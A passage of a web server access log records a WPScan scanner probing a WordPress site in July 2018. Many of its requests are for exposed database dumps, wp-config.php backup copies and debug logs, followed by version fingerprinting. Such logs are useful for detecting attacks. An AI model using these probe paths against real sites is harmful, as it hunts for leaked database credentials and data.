(http://wpscan.org)"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[23/Jul/2018:11:08:37 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET / HTTP/1.1 96418 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:38 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/plugins HTTP/1.1 323 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:38 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 HEAD / HTTP/1.1 - "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:39 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /robots.txt HTTP/1.1 285 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:39 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /humans.txt HTTP/1.1 285 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:39 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /.well-known/security.txt HTTP/1.1 299 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:39 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /ganga.sql HTTP/1.1 284 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /ganga.sql.gz HTTP/1.1 287 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /ganga.zip HTTP/1.1 284 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /db.sql HTTP/1.1 281 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /site.sql HTTP/1.1 283 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /database.sql HTTP/1.1 287 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /data.sql HTTP/1.1 283 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:40 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /backup.sql HTTP/1.1 285 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /dump.sql HTTP/1.1 283 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /db_backup.sql HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /dbdump.sql HTTP/1.1 285 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wordpress.sql HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /mysql.sql HTTP/1.1 284 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:41 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/debug.log HTTP/1.1 295 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /%23wp-config.php%23 HTTP/1.1 290 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.save HTTP/1.1 293 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php%7E HTTP/1.1 289 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /.wp-config.php.swp HTTP/1.1 293 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.swp HTTP/1.1 292 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.swo HTTP/1.1 292 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php_bak HTTP/1.1 292 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.bak HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.bak HTTP/1.1 292 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:42 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.save HTTP/1.1 289 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:43 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.old HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:43 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.old HTTP/1.1 292 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:44 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.orig HTTP/1.1 289 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:44 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.orig HTTP/1.1 293 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:44 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.original HTTP/1.1 293 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:44 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.php.original HTTP/1.1 297 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:45 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-config.txt HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /searchreplacedb2.php HTTP/1.1 295 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /emergency.php HTTP/1.1 288 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-signup.php HTTP/1.1 - "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/mu-plugins/ HTTP/1.1 297 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /xmlrpc.php HTTP/1.1 42 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:46 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /xmlrpc.php HTTP/1.1 42 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-json/ HTTP/1.1 283 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /index.php/feed/ HTTP/1.1 31241 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:47 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /index.php/feed/ HTTP/1.1 31241 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:48 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/rss-functions.php HTTP/1.1 - "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:48 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:48 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-content/uploads/ HTTP/1.1 1725 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:49 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/ HTTP/1.1 40839 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:49 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /readme.html HTTP/1.1 7413 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:50 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:11:08:51 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:49 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/wp-tinymce.js.gz HTTP/1.1 200338 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:52 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/wp-admin.css HTTP/1.1 296 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:52 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:52 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/customize-controls.js HTTP/1.1 166341 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:53 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:53 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/common.js HTTP/1.1 28584 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:54 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/customize-controls.min.js HTTP/1.1 64808 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:54 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:55 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/post.js HTTP/1.1 37409 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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::1 - - [23/Jul/2018:11:08:56 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:55 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/media-views.js HTTP/1.1 231539 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:57 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:57 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/media-views.min.js HTTP/1.1 104963 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:58 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/press-this.css HTTP/1.1 35109 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:58 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/common.min.js HTTP/1.1 14085 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:58 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:58 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/customize-nav-menus.js HTTP/1.1 98570 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:59 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/customize-nav-menus.min.js HTTP/1.1 43985 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:08:59 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:08:59 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/colors-classic.css HTTP/1.1 306 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:08:59 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/tiny_mce.js HTTP/1.1 309 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/rtl.css HTTP/1.1 291 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/wp-admin.css HTTP/1.1 365 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/colors-fresh.css HTTP/1.1 304 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/autosave.js HTTP/1.1 16394 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:09:00 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/editor.js HTTP/1.1 19992 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:00 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/media.css HTTP/1.1 24138 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:01 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/media-views-rtl.min.css HTTP/1.1 42708 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:01 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/global.css HTTP/1.1 298 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:09:01 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:09:01 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/wp-admin.min.css HTTP/1.1 421 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:01 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpeditimage/plugin.js HTTP/1.1 31475 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:02 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/quicktags.js HTTP/1.1 296 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:02 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-emoji-loader.min.js HTTP/1.1 1950 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:02 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/wp-emoji-loader.js HTTP/1.1 5280 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:02 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/media-views.min.css HTTP/1.1 42711 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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::1 - - [23/Jul/2018:11:09:02 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g (internal dummy connection)"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[23/Jul/2018:11:09:02 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/widgets-rtl.css HTTP/1.1 13589 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/editor.css HTTP/1.1 34194 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js HTTP/1.1 15100 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js HTTP/1.1 334 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/media-editor.min.js HTTP/1.1 10905 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:03 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wplink/plugin.min.js HTTP/1.1 9026 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/ie.css HTTP/1.1 12002 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js HTTP/1.1 332 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/theme.js HTTP/1.1 52899 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/wp-admin.dev.css HTTP/1.1 304 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:04 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/customize-controls.dev.js HTTP/1.1 312 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/editor.min.css HTTP/1.1 28102 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/login.min.css HTTP/1.1 25477 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:05 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/forms-rtl.css HTTP/1.1 25800 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/link.js HTTP/1.1 2247 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/global.dev.css HTTP/1.1 302 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpview/plugin.js HTTP/1.1 5413 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/wp-admin-rtl.min.css HTTP/1.1 477 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/js/theme.min.js HTTP/1.1 25859 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:06 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/global-rtl.css HTTP/1.1 302 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/install.css HTTP/1.1 7393 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/media-views-rtl.css HTTP/1.1 51084 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/tinymce/plugins/wpview/plugin.min.js HTTP/1.1 2627 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:07 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/wp-admin-rtl.css HTTP/1.1 421 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/js/media-editor.js HTTP/1.1 29868 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/widgets.css HTTP/1.1 13591 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-includes/css/media-views.css HTTP/1.1 51087 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:08 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/login-rtl.min.css HTTP/1.1 25493 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:09 +0000] ganga.site 94.242.54.22 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 GET /wp-admin/css/forms.css HTTP/1.1 25788 "https://ganga.site/" "WPScan v2.9.5-dev (http://wpscan.org)"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[23/Jul/2018:11:09:09 +0000] ganga.site 